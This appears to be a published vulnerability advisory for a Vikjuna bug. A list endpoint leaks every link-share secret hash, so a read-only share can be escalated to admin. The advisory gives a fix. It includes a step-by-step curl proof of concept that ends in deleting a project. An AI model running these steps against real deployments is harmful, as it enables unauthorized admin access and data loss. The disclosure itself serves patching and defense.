CVE-2026-33680

HIGH7.5EPSS 0.02%

Vikjuna: Link Share Hash Disclosure via ReadAll Endpoint Enables Permission Escalation

Published: 3/25/2026Modified: 3/30/2026
Also known as:GHSA-8hp8-9fhr-pfm9GO-2026-4848

Description

## Summary The `LinkSharing.ReadAll()` method allows link share authenticated users to list all link shares for a project, including their secret hashes. While `LinkSharing.CanRead()` correctly blocks link share users from reading individual shares via `ReadOne`, the `ReadAllWeb` handler bypasses this check by never calling `CanRead()`. An attacker with a read-only link share can retrieve hashes for write or admin link shares on the same project and authenticate with them, escalating to full admin access. ## Details The vulnerability arises from an inconsistency between the `ReadOneWeb` and `ReadAllWeb` generic handlers and the `LinkSharing` permission model. **`LinkSharing.CanRead()` correctly blocks link share users** (`pkg/models/link_sharing_permissions.go:25-29`): ```go func (share *LinkSharing) CanRead(s *xorm.Session, a web.Auth) (bool, int, error) { if _, is := a.(*LinkSharing); is { return false, 0, nil // Blocks link share users } // ... } ``` **`ReadOneWeb` calls `CanRead()` before returning data** (`pkg/web/handler/read_one.go:64`): ```go canRead, maxPermission, err := currentStruct.CanRead(s, currentAuth) if !canRead { return echo.NewHTTPError(http.StatusForbidden, ...) } ``` **`ReadAllWeb` does NOT call `CanRead()`** (`pkg/web/handler/read_all.go:106`): ```go // Directly calls ReadAll without permission check result, resultCount, numberOfItems, err := currentStruct.ReadAll(s, currentAuth, search, pageNumber, perPageNumber) ``` **`LinkSharing.ReadAll()` only checks project-level read access** (`pkg/models/link_sharing.go:228-236`): ```go func (share *LinkSharing) ReadAll(s *xorm.Session, a web.Auth, ...) (...) { project := &Project{ID: share.ProjectID} can, _, err := project.CanRead(s, a) // Link share users pass this! if !can { return nil, 0, 0, ErrGenericForbidden{} } // Returns all shares with hashes... ``` **`Project.CanRead()` allows link share users** (`pkg/models/project_permissions.go:105-108`): ```go shareAuth, ok := a.(*LinkSharing) if ok { return p.ID == shareAuth.ProjectID && (shareAuth.Permission == PermissionRead || ...), ... } ``` The `Hash` field is exposed in JSON serialization (`pkg/models/link_sharing.go:50`): ```go Hash string `xorm:"varchar(40) not null unique" json:"hash" param:"hash"` ``` While the `Password` field is cleared at line 276, the `Hash` — which is the secret token used to authenticate — is returned in full. ## PoC **Prerequisites:** A project with multiple link shares at different permission levels (common scenario: a read-only share for public access and a write/admin share for collaborators). **Step 1: Authenticate with a read-only link share** ```bash # Authenticate with a read-only link share hash curl -s -X POST http://localhost:3456/api/v1/shares/READ_ONLY_HASH/auth \ | jq '.token' # Returns: JWT token with permission=0 (read) ``` **Step 2: List all link shares for the project (hash disclosure)** ```bash # Use the read-only JWT to list ALL shares including their hashes curl -s -H "Authorization: Bearer <read-only-jwt>" \ http://localhost:3456/api/v1/projects/PROJECT_ID/shares \ | jq '.[].hash, .[].permission' # Returns ALL shares with their hashes and permission levels: # "READ_ONLY_HASH" permission: 0 # "ADMIN_HASH" permission: 2 <-- leaked! ``` **Step 3: Escalate to admin using the leaked hash** ```bash # Authenticate with the admin link share hash curl -s -X POST http://localhost:3456/api/v1/shares/ADMIN_HASH/auth \ | jq '.token' # Returns: JWT token with permission=2 (admin) ``` **Step 4: Exercise admin privileges** ```bash # Delete the project (admin-only operation) curl -s -X DELETE -H "Authorization: Bearer <admin-jwt>" \ http://localhost:3456/api/v1/projects/PROJECT_ID # Success — full admin access achieved from a read-only share ``` ## Impact - **Permission escalation:** An attacker with any link share URL (including read-only) can escalate to the highest permission level of any other link share on the same project - **Credential disclosure:** All link share hashes for a project are exposed, which are effectively bearer tokens - **No account required:** Link shares are designed for unauthenticated access — the attacker only needs a link share URL that was shared publicly or forwarded to them - **Common scenario:** Projects with both read-only (public) and write/admin (collaborator) link shares are the standard use case for tiered sharing - **Password-protected shares:** Even password-protected share hashes are leaked, though exploitation requires knowing/brute-forcing the password ## Recommended Fix Add a link share user check at the beginning of `LinkSharing.ReadAll()`, mirroring the check in `CanRead()`: ```go // In pkg/models/link_sharing.go, at the start of ReadAll(): func (share *LinkSharing) ReadAll(s *xorm.Session, a web.Auth, search string, page int, perPage int) (result interface{}, resultCount int, totalItems int64, err error) { // Don't allow link share users to list link shares if _, is := a.(*LinkSharing); is { return nil, 0, 0, ErrGenericForbidden{} } project := &Project{ID: share.ProjectID} // ... rest of method unchanged ``` Alternatively, as a defense-in-depth measure, exclude the `Hash` field from JSON serialization for list responses by using `json:"-"` and only returning it on creation. However, the primary fix should be the authorization check since the hash is needed in the creation response.

Affected packages (2)

CVSS scores

SourceVersionSeverityVector
osvCVSS 3.1HIGH7.5CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

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